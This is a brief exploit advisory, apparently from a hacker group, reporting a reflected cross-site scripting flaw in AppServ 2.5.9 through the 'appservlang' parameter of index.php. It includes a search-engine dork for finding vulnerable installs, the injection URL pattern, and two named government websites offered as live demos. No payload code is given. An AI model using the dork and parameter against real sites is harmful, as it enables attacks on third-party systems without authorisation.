AppServ 2.5.9 Cross Site Scripting
HOMe : http://www.appservnetwork.com
Author : sH@rk-Dz
Date: 28/05/2014
Tested on : Linux
D0rk : intitle:"AppServ Open Project" -site:www.appservnetwork.com
Vulnerable File : /index.php
Exploit : http://localhost.com/index.php?appservlang=
Demo1:http://testbank.moXe.gov.eg/index.php?appservlang=(xss)
Demo2:http://www.fXcea.gov.tw/index.php?appservlang=(xss)
In The Name Of Allah ^_^
The Vuln Found in the file ==> index.php
index.php at the paramter ?appservlang=
we can also inject any code of xss and send by GET in live http-Headers
and also we can iject string not only number using Charcode (in hackbar ther's small addon)
note:type of the vul is reflected :)
Greet's To : All ALG & ARB E-Hackers & Welad cha3b DZ